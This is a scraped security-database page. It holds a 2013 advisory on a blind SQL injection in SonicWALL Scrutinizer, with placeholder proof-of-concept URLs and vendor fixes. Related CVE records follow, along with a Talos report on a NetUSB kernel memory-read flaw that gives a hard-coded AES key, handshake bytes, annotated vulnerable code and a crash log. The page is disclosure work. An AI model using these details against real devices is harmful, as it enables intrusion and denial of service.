9984: Investigate Vulnerability Lab issues (this ticket included tracking the creation of our DBI shim to error on semi-colon)
10149: Create a common function to escape characters that can be used for SQL injection
10139: Review all mapping and flow analytics queries to make sure inputs included in SQL are escaped
10141: Review all reporting and filtering queries to make sure inputs included in SQL are escaped
10140: Review all alarm tab and admin tab queries to make sure inputs included in SQL are escaped
VL-ID:
789
Common Vulnerability Scoring System:
7.3
Introduction:
Dell SonicWALL Scrutinizer is a multi-vendor, flow-based application traffic analytics, visualization and reporting tool
to measure and troubleshoot network performance and utilization while increasing productivity for enterprises and service providers.
Scrutinizer supports a wide range of routers, switches, firewalls, and data-flow reporting protocols, providing unparalleled insight
into application traffic analysis from IPFIX/NetFlow data exported by Dell SonicWALL firewalls, as well as support for a wide range
of routers, switches, firewalls, and data-flow reporting protocols. IT administrators in charge of high throughput networks can
deploy Scrutinizer as a virtual appliance for high performance environments.
(Copy of the Vendor Homepage: http://www.sonicwall.com/us/en/products/Scrutinizer.html )
Abstract:
The Vulnerability Laboratory Research Team discovered SQL Injection vulnerability in the Dells Sonicwall OEM Scrutinizer v9.5.2 appliance application.
A blind SQL Injection vulnerability is detected in the Sonicwall OEM Scrutinizer v9.5.2 appliance application.
The bug allows remote attackers to execute/inject own sql statement/commands to manipulate the affected vulnerable application dbms.
The sql injection vulnerability is located in the fa_web.cgi file with the bound gadget listing module and the vulnerable orderby or
gadget parameters. Exploitation requires no user interaction & without privileged application user account. Successful exploitation of
the remote sql vulnerability results in dbms & application compromise.
Vulnerable File(s):
[+] fa_web.cgi
Vulnerable Module(s):
[+] gadget listing
Vulnerable Parameter(s):
[+] orderby
[+] gadget
Proof of Concept:
The remote sql injection vulnerability can be exploited by remote attackers without required privileged application user account
and also without user interaction. For demonstration or reproduce ...
1) Scrutinizer team created a own DB layer that will die if a semicolon is found within a SQL query
2) We have changed more queries to pass inputs as bound variables to the DB engine which prevents possible SQL injection
Risk:
The security risk of the remote sql injection vulnerability is estimated as high(+).
Credits:
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)
Disclaimer:
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.
-- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: research@vulnerability-lab.com
{"id": "SECURITYVULNS:DOC:29052", "bulletinFamily": "software", "title": "Sonicwall Scrutinizer v9.5.2 - SQL Injection Vulnerability", "description": "\r\n\r\nTitle:\r\n======\r\nSonicwall Scrutinizer v9.5.2 - SQL Injection Vulnerability\r\n\r\n\r\nDate:\r\n=====\r\n2013-02-13\r\n\r\n\r\nReferences:\r\n===========\r\nhttp://www.vulnerability-lab.com/get_content.php?id=789\r\n\r\n#9984: Investigate Vulnerability Lab issues (this ticket included tracking the creation of our DBI shim to error on semi-colon)\r\n#10149: Create a common function to escape characters that can be used for SQL injection\r\n#10139: Review all mapping and flow analytics queries to make sure inputs included in SQL are escaped\r\n#10141: Review all reporting and filtering queries to make sure inputs included in SQL are escaped\r\n#10140: Review all alarm tab and admin tab queries to make sure inputs included in SQL are escaped\r\n\r\n\r\nVL-ID:\r\n=====\r\n789\r\n\r\n\r\nCommon Vulnerability Scoring System:\r\n====================================\r\n7.3\r\n\r\n\r\nIntroduction:\r\n=============\r\nDell SonicWALL Scrutinizer is a multi-vendor, flow-based application traffic analytics, visualization and reporting tool \r\nto measure and troubleshoot network performance and utilization while increasing productivity for enterprises and service providers. \r\nScrutinizer supports a wide range of routers, switches, firewalls, and data-flow reporting protocols, providing unparalleled insight \r\ninto application traffic analysis from IPFIX/NetFlow data exported by Dell SonicWALL firewalls, as well as support for a wide range \r\nof routers, switches, firewalls, and data-flow reporting protocols. IT administrators in charge of high throughput networks can \r\ndeploy Scrutinizer as a virtual appliance for high performance environments. \r\n\r\n(Copy of the Vendor Homepage: http://www.sonicwall.com/us/en/products/Scrutinizer.html )\r\n\r\n\r\n\r\nAbstract:\r\n=========\r\nThe Vulnerability Laboratory Research Team discovered SQL Injection vulnerability in the Dells Sonicwall OEM Scrutinizer v9.5.2 appliance application.\r\n\r\n\r\nReport-Timeline:\r\n================\r\n2012-12-05:\tResearcher Notification & Coordination\r\n2012-12-07:\tVendor Notification\r\n2013-01-08:\tVendor Response/Feedback\r\n2013-02-10:\tVendor Fix/Patch\r\n2013-02-11:\tPublic Disclosure\r\n\r\n\r\nStatus:\r\n========\r\nPublished\r\n\r\n\r\nAffected Products:\r\n==================\r\nDELL\r\nProduct: Sonicwall OEM Scrutinizer 9.5.2\r\n\r\n\r\nExploitation-Technique:\r\n=======================\r\nRemote\r\n\r\n\r\nSeverity:\r\n=========\r\nHigh\r\n\r\n\r\nDetails:\r\n========\r\nA blind SQL Injection vulnerability is detected in the Sonicwall OEM Scrutinizer v9.5.2 appliance application.\r\nThe bug allows remote attackers to execute/inject own sql statement/commands to manipulate the affected vulnerable application dbms.\r\nThe sql injection vulnerability is located in the fa_web.cgi file with the bound gadget listing module and the vulnerable orderby or \r\ngadget parameters. Exploitation requires no user interaction & without privileged application user account. Successful exploitation of \r\nthe remote sql vulnerability results in dbms & application compromise. \r\n\r\nVulnerable File(s):\r\n\t\t\t[+] fa_web.cgi\r\n\r\nVulnerable Module(s):\r\n\t\t\t[+] gadget listing\r\n\r\nVulnerable Parameter(s):\r\n\t\t\t[+] orderby\r\n\t\t\t[+] gadget\r\n\r\n\r\nProof of Concept:\r\n=================\r\nThe remote sql injection vulnerability can be exploited by remote attackers without required privileged application user account \r\nand also without user interaction. For demonstration or reproduce ...\r\n\r\nPoC:\r\nhttp://127.0.0.1:1339/cgi-bin/fa_web.cgi?gadget=applicationsbytes-1%27[SQL INJECTION VULNERABILITY!]&orderby=1&cachebreaker=23_52_5_814-1%27\r\nhttp://127.0.0.1:1339/cgi-bin/fa_web.cgi?gadget=applicationsbytes&orderby=-1%27[SQL INJECTION VULNERABILITY!]&cachebreaker=23_52_5_814-1%27\r\n\r\n\r\n\r\nSolution:\r\n=========\r\n1) Scrutinizer team created a own DB layer that will die if a semicolon is found within a SQL query\r\n2) We have changed more queries to pass inputs as bound variables to the DB engine which prevents possible SQL injection\r\n\r\n\r\nRisk:\r\n=====\r\nThe security risk of the remote sql injection vulnerability is estimated as high(+).\r\n\r\n\r\nCredits:\r\n========\r\nVulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)\r\n\r\n\r\nDisclaimer:\r\n===========\r\nThe information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, \r\neither expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-\r\nLab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business \r\nprofits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some \r\nstates do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation \r\nmay not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases \r\nor trade with fraud/stolen material.\r\n\r\nDomains: www.vulnerability-lab.com \t- www.vuln-lab.com\t\t\t - www.vulnerability-lab.com/register\r\nContact: admin@vulnerability-lab.com \t- support@vulnerability-lab.com \t - research@vulnerability-lab.com\r\nSection: video.vulnerability-lab.com \t- forum.vulnerability-lab.com \t\t - news.vulnerability-lab.com\r\nSocial:\t twitter.com/#!/vuln_lab \t\t- facebook.com/VulnerabilityLab \t - youtube.com/user/vulnerability0lab\r\nFeeds:\t vulnerability-lab.com/rss/rss.php\t- vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php\r\n\r\nAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. \r\nPermission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other \r\nmedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and \r\nother information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), \r\nmodify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.\r\n\r\n \t\t\t\t \tCopyright \u00a9 2012 | Vulnerability Laboratory\r\n\r\n-- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: research@vulnerability-lab.com\r\n", "published": "2013-02-18T00:00:00", "modified": "2013-02-18T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29052", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:47", "edition": 1, "viewCount": 23, "enchantments": {"score": {"value": 6.0, "vector": "NONE", "modified": "2018-08-31T11:10:47", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-7273", "CVE-2014-2595", "CVE-2015-9286", "CVE-2008-7272"]}, {"type": "talos", "idList": ["TALOS-2019-0775"]}, {"type": "zdt", "idList": ["1337DAY-ID-29052"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32652", "SECURITYVULNS:DOC:32654", "SECURITYVULNS:DOC:32653", "SECURITYVULNS:DOC:32656", "SECURITYVULNS:VULN:14755", "SECURITYVULNS:VULN:14753", "SECURITYVULNS:DOC:32651", "SECURITYVULNS:VULN:14720", "SECURITYVULNS:DOC:32660", "SECURITYVULNS:DOC:32658"]}], "modified": "2018-08-31T11:10:47", "rev": 2}, "vulnersScore": 6.0}, "affectedSoftware": []}
{"cve": [{"lastseen": "2021-02-02T06:14:28", "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-12T01:15:00", "title": "CVE-2014-2595", "type": "cve", "cwe": ["CWE-613"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2595"], "modified": "2020-02-20T15:55:00", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "id": "CVE-2014-2595", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:35:21", "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 8, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-18T22:15:00", "title": "CVE-2008-7273", "type": "cve", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7273"], "modified": "2019-11-20T15:56:00", "cpe": [], "id": "CVE-2008-7273", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2021-02-02T05:35:21", "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 8, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-11-08T00:15:00", "title": "CVE-2008-7272", "type": "cve", "cwe": ["CWE-312"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7272"], "modified": "2020-02-10T21:16:00", "cpe": [], "id": "CVE-2008-7272", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2021-02-02T06:21:32", "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 6, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2019-04-30T14:29:00", "title": "CVE-2015-9286", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9286"], "modified": "2019-05-01T14:22:00", "cpe": [], "id": "CVE-2015-9286", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}], "talos": [{"lastseen": "2020-07-01T21:25:26", "bulletinFamily": "info", "cvelist": ["CVE-2019-5016"], "description": "# Talos Vulnerability Report\n\n### TALOS-2019-0775\n\n## KCodes NetUSB unauthenticated remote kernel arbitrary memory read vulnerability\n\n##### June 14, 2019\n\n##### CVE Number\n\nCVE-2019-5016\n\n### Summary\n\nAn exploitable arbitrary memory read vulnerability exists in the KCodes NetUSB.ko kernel module which enables the ReadySHARE Printer functionality of at least two NETGEAR Nighthawk Routers and potentially several other vendors/products. A specially crafted index value can cause an invalid memory read, resulting in a denial of service or remote information disclosure. An unauthenticated attacker can send a crafted packet on the local network to trigger this vulnerability.\n\n### Tested Versions\n\nNETGEAR Nighthawk AC3200 (R8000) Firmware Version V1.0.4.28_10.1.54 (11/7/18) - NetUSB.ko 1.0.2.66 NETGEAR Nighthawk AC3000 (R7900) Firmware Version V1.0.3.8_10.0.37 (11/1/18) - NetUSB.ko 1.0.2.69\n\n### Product URLs\n\n<http://www.kcodes.com> <https://www.netgear.com/home/products/networking/wifi-routers/R7900.aspx> <https://www.netgear.com/home/products/networking/wifi-routers/R8000.aspx> <https://www.netgear.com/support/product/ReadySHARE_USB_Printer.aspx>\n\n### CVSSv3 Score\n\n10.0 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H\n\n### CWE\n\nCWE-200: Information Exposure\n\n### Details\n\nSome NETGEAR routers utilize a bespoke kernel module called NetUSB.ko from a Taiwanese company called KCodes. This module is custom-made for each device, but contains similar functionality. The module shares USB devices over TCP, allowing clients to use various vendor-made drivers and software to connect to these devices in such a way that the client machine treats the remote device as a local USB device plugged into their computer. The software used for NETGEAR routers is called NETGEAR USB Control Center that utilizes a driver called NetUSBUDSTcpBus.sys (on Windows) for communications. Many other products use NetUSB.ko. Unfortunately, we are unable to test so many potential devices. A [previously disclosed vulnerability](<'https://www.sec-consult.com/en/blog/2015/05/kcodes-netusb-how-small-taiwanese'>) in 2015 lead researches to believe a flaw in this very kernel module potentially existed in as many as 92 products across multiple vendors. For this analysis, we utilized the R8000 hardware to test the R8000 version of NetUSB.ko (1.0.2.66) and the R7900 version (1.0.2.69) since both modules are compiled for the same kernel.\n\nWhen establishing communications to a remote USB device, a handshake must first occur. The handshake works as follows:\n\nThe client send bytes \u201c0x5605\u201d followed by 16-bytes of \u201crandom\u201d data\n \n \n 00000000 56 05 V.\n 00000002 81 77 d9 74 f8 9f b4 74 ee 94 02 07 0d b1 38 40 .w.t...t ......8@\n \n\nThe server (router) will encrypt those bytes using the static AES key `5c130b59d26242649ed488382d5eaecc`, which is hard-coded into NetUSB.ko and retrieved by decrypting `0B7928FF6A76223C21A3B794084E1CAD` with the key `A2353556541CFE44EC468248064DE66C`.\n\nAfter encrypting the client data, the encrypted response is sent back to the client along with 16 bytes of \u201crandom\u201d data for the client to encrypt and return. 00000000 29 9e 4d 05 f6 d0 9d 98 ae 7f 81 35 39 83 67 13 ).M\u2026.. \u202659.g. // Client data encrypted 00000010 af 60 20 6b fa 52 7d 90 82 a3 82 63 f4 b1 14 c1 .` k.R}. \u2026c\u2026. // Server data to be encrypted and returned\n\nThe client responds by encrypting the \u201crandom\u201d server data using the same AES key followed by the length of the client\u2019s computer name as four bytes in little-endian format. Following this is the computer name itself and the synch command 0x7, which is also in little-endian format and four bytes in length.\n \n \n 00000012 2c b7 34 c6 32 e3 70 0e 26 bc 66 48 b8 7b c1 1c ,.4.2.p. &.fH.{.. // Encrypted server data\n 00000022 0c 00 00 00 .... // Computer name length\n 00000026 57 49 4e 44 4f 57 53 50 43 2d 30 31 WINDOWSP C-01 // Computer name\n 00000032 07 00 00 00 .... // Sync Command\n \n\nThe handshake is completed when the server responds with 0x17 (0x15 means a device is unavailable):\n \n \n 00000020 17 00 00 00 .... // Connection Established\n \n\nTo actually use the device and establish a remote TCP Bus, a series of opcodes and data are sent to the server. The second byte when establishing such communications is a device number or index into a list of available shared devices on the stack. This byte is not validated and allows a remote attacker to trigger the module to attempt to read arbitrary memory, eventually leading to a remote memory leak. In this example, we are calling \u2018getConfigDescriptor\u2019 using opcode `0x2`.\n\nThe vulnerable code :\n \n \n 00007E30 LDRB R3, [R4,#1] ; R4 is our command buffer, R3 is set with our index value\n 00007E34 ADD R3, R6, R3,LSL#2 ; add index*4 to the r6 (sbus address -- holds our session info) this is where we can use a malicious index (0x8a) to instead point this buffer to our hostname in the sbus buffer\n 00007E38 LDR R5, [R3,#0x2C] ; increment the sbus address by 0x2c\n 00007E3C CMP R5, #0 ; Ensure value is not NULL\n 00007E40 BNE loc_7E68 ; Br\n \n 00007E68 LDR R7, [R5,#0x44] R5 now points to our hostname buffer + 0x44\n [snip]\n 00007E84 BL getConfigDescriptor ;\n [snip]\n 00003960 getConfigDescriptor\n [snip]\n 00003A48 LDR R3, [R5,#0x1B4] ; dereference [R5+0x44] pointer\n 00003A4C LDR R3, [R3,R7,LSL#2] ; R7 we control with the 3rd byte in our command, we leave this at 0.\n 00003A50 LDRB R2, [R3,#2] ; R2 = 3rd byte of [R3]\n 00003A54 LDRB R3, [R3,#3] ; R3 = 4th byte of [R3]\n 00003A58 ORR R2, R2, R3,LSL#8 ; R2 = R2 | R3 * 256 -- this is the memcpy size if < 0x9\n 00003A5C LDR R3, [R5,#0x1B4] ; Again dereference [r5+0x44] pointer\n 00003A60 CMP R6, R2 ; compare R6 (descriptor length -- hardcoded 0x9) to our R2 value obtained at 0x3a58\n 00003A64 MOVGE R0, R4\n 00003A68 MOVLT R0, R4 ; This destination is the data buffer that will be sent back to the client\n 00003A6C MOVLT R2, R6 ; If R6 < R2 at 0x3a60, use R6 as the count parameter (0x9).\n 00003A70 LDRGE R1, [R3,R7,LSL#2] ; This will be our source buffer\n 00003A74 LDRLT R1, [R3,R7,LSL#2] ; This is the pointer we received at 0x3a5c\n 00003A78 BL memcpy ; We can now control what data is read into this buffer and eventually the memory contents are returned to the client.\n \n\n### Crash Information\n\nCrash output:\n\n# If we give an invalid address at any point, we can simply DOS the target:\n \n \n [ 116.820000] INFO1624: new connection from 192.168.1.2 : cf5d3a00\n [ 117.420000] INFO1EFE: command local:00000017 remote:00000007 final:00000007\n [ 117.430000] INFO1F3C: new Tunnel : remote ID = MYHOSTNAME, length = 10\n [ 117.440000] INFO14A5: new connection sbus ca8ed400\n [ 117.440000] V4 : 0201A8C0\n [ 117.630000] kc 144 : dbgd client connect ok cf5d36c0\n [ 117.830000] INFO04FB: _fillBuf(): len = 0\n [ 117.830000] INFO0471: KTCP_Stop : sbus ca8ed400 name:MYHOSTNAME\n [ 117.840000] INFO146F: SoftwareBus_dispatchThread exit\n [ 118.050000] INFO1624: new connection from 192.168.1.2 : cf68e000\n [ 118.650000] INFO1EFE: command local:00000017 remote:00000007 final:00000007\n [ 118.660000] INFO1F3C: new Tunnel : remote ID = PAD\ufffd@AA\ufffd\u050e\ufffd`\u058e\u02a0\ufffd, length = 19\n [ 118.660000] INFO14A5: new connection sbus ca8ed400\n [ 118.670000] V4 : 0201A8C0\n [ 119.050000] Unable to handle kernel paging request at virtual address 41414141\n [ 119.060000] pgd = c0004000\n [ 119.060000] [41414141] *pgd=00000000\n [ 119.060000] Internal error: Oops: 5 [#1] PREEMPT SMP\n [ 119.060000] last sysfs file: /sys/kernel/uevent_seqnum\n [ 119.060000] module: NetUSB bf111000 162837\n [ 119.060000] module: GPL_NetUSB bf10a000 3743\n [ 119.060000] module: MultiSsidCntl bf103000 5265\n [ 119.060000] module: ip_set_hash_net bf0f7000 21118\n [ 119.060000] module: ip_set_hash_ipmark bf0ec000 18532\n [ 119.060000] module: ip_set_list_set bf0e5000 6885\n [ 119.060000] module: ip_set_hash_netiface bf0d9000 22630\n [ 119.060000] module: ip_set_hash_ipmac bf0ce000 19038\n [ 119.060000] module: ip_set_hash_mac bf0c6000 9433\n [ 119.060000] module: ip_set_hash_ip bf0bb000 18296\n [ 119.060000] module: ip_set_hash_netportnet bf0ae000 25242\n [ 119.060000] module: ip_set_hash_ipportnet bf0a2000 24446\n [ 119.060000] module: ip_set_bitmap_port bf09e000 5721\n [ 119.060000] module: ip_set_hash_netport bf092000 22954\n [ 119.060000] module: ip_set_hash_ipport bf087000 19156\n [ 119.060000] module: ip_set_bitmap_ipmac bf048000 6351\n [ 119.060000] module: ip_set_hash_netnet bf026000 24018\n [ 119.060000] module: ip_set_hash_ipportip bf01b000 20008\n [ 119.060000] module: ip_set_bitmap_ip bf007000 6397\n [ 119.060000] module: ip_set bf686000 24837\n [ 119.060000] module: ipv6_spi bf675000 39791\n [ 119.060000] module: ufsd bf5c7000 627276\n [ 119.060000] module: jnl bf5b8000 29052\n [ 119.060000] module: acos_nat bf258000 3444282\n [ 119.060000] module: dhd bf04b000 236809\n [ 119.060000] module: dpsta bf045000 2921\n [ 119.060000] module: et bf030000 52421\n [ 119.060000] module: igs bf015000 13866\n [ 119.060000] module: emf bf00b000 16229\n [ 119.060000] module: ctf bf000000 17805\n [ 119.060000] Modules linked in: NetUSB(P) GPL_NetUSB MultiSsidCntl(P) ip_set_hash_net ip_set_hash_ipmark ip_set_list_set ip_set_hash_netiface ip_set_hash_ipmac ip_set_hash_mac ip_set_hash_ip ip_set_hash_netportne\n t ip_set_hash_ipportnet ip_set_bitmap_port ip_set_hash_netport ip_set_hash_ipport ip_set_bitmap_ipmac ip_set_hash_netnet ip_set_hash_ipportip ip_set_bitmap_ip ip_set ipv6_spi(P) ufsd(P) jnl acos_nat(P) dhd dpsta(P)\n et(P) igs(P) emf(P) ctf(P) [last unloaded: ipv6_spi]\n [ 119.060000] CPU: 0 Tainted: P (2.6.36.4brcmarm+ #17)\n [ 119.060000] PC is at SoftwareBus_reportConfigDescGot+0x90/0x268 [NetUSB]\n [ 119.060000] LR is at SoftwareBus_reportConfigDescGot+0x58/0x268 [NetUSB]\n [ 119.060000] pc : [<bf118e68>] lr : [<bf118e30>] psr: 20000013\n [ 119.060000] sp : ca00ff60 ip : cf937fe0 fp : 00000000\n [ 119.060000] r10: 00000000 r9 : 00000000 r8 : 00000000\n [ 119.060000] r7 : bf124f1c r6 : ca8ed400 r5 : 414140fd r4 : cf937fe0\n [ 119.060000] r3 : ca8ed628 r2 : 00000000 r1 : a0000013 r0 : ca8ed400\n [ 119.060000] Flags: nzCv IRQs on FIQs on Mode SVC_32 ISA ARM Segment kernel\n [ 119.060000] Control: 10c53c7d Table: 8a05c04a DAC: 00000017\n [ 119.060000] Process NU Work:4696 (pid: 20370, stack limit = 0xca00e270)\n [ 119.060000] Stack: (0xca00ff60 to 0xca010000)\n [ 119.060000] ff60: 7fffffff ca8866f0 ca8866f4 c03830c4 ffffffff ffffffff ca00e000 04134868\n [ 119.060000] ff80: cf937fc0 00000000 ca00ffcc bf124f1c 00000000 00000000 00000000 bf11ec68\n [ 119.060000] ffa0: ca8866c0 bf134868 ca00ffcc bf124f70 00000000 ca065f28 ca8866c0 c0078cdc\n [ 119.060000] ffc0: ca065f28 00000000 ca8866c0 00000001 00000000 00000000 ca00ffd8 ca00ffd8\n [ 119.060000] ffe0: 00000000 ca065f28 c0078c58 c0040b58 00000013 c0040b58 00000000 00000000\n [ 119.060000] [<bf118e68>] (PC is at SoftwareBus_reportConfigDescGot+0x90/0x268 [NetUSB])\n [ 119.060000] [<bf118e68>] (SoftwareBus_reportConfigDescGot+0x90/0x268 [NetUSB]) from [<bf11ec68>] (SoftwareBusWorkThreadProc+0x90/0xc4 [NetUSB])\n [ 119.060000] [<bf11ec68>] (SoftwareBusWorkThreadProc+0x90/0xc4 [NetUSB]) from [<bf124f70>] (_thread_create_helper+0x54/0x114 [NetUSB])\n [ 119.060000] [<bf124f70>] (_thread_create_helper+0x54/0x114 [NetUSB]) from [<c0078cdc>] (kthread+0x84/0x8c)\n [ 119.060000] [<c0078cdc>] (kthread+0x84/0x8c) from [<c0040b58>] (kernel_thread_exit+0x0/0x8)\n [ 119.060000] Code: eb3d9379 e5c45003 e5c45004 ea000033 (e5957044)\n [ 119.430000] INFO04FB: _fillBuf(): len = 0\n [ 119.440000] ---[ end trace 54b44174edbb4652 ]---\n [ 119.440000] Kernel panic - not syncing: Fatal exception\n [ 119.450000] [<c0046358>] (unwind_backtrace+0x0/0xe4) from [<c0382d94>] (panic+0x68/0x194)\n [ 119.460000] [<c0382d94>] (panic+0x68/0x194) from [<c0043548>] (die+0x194/0x1dc)\n [ 119.460000] [<c0043548>] (die+0x194/0x1dc) from [<c00474f8>] (__do_kernel_fault+0x64/0x84)\n [ 119.470000] [<c00474f8>] (__do_kernel_fault+0x64/0x84) from [<c00476dc>] (do_page_fault+0x1c4/0x1d8)\n [ 119.480000] [<c00476dc>] (do_page_fault+0x1c4/0x1d8) from [<c003f3a4>] (do_DataAbort+0x30/0x98)\n [ 119.490000] [<c003f3a4>] 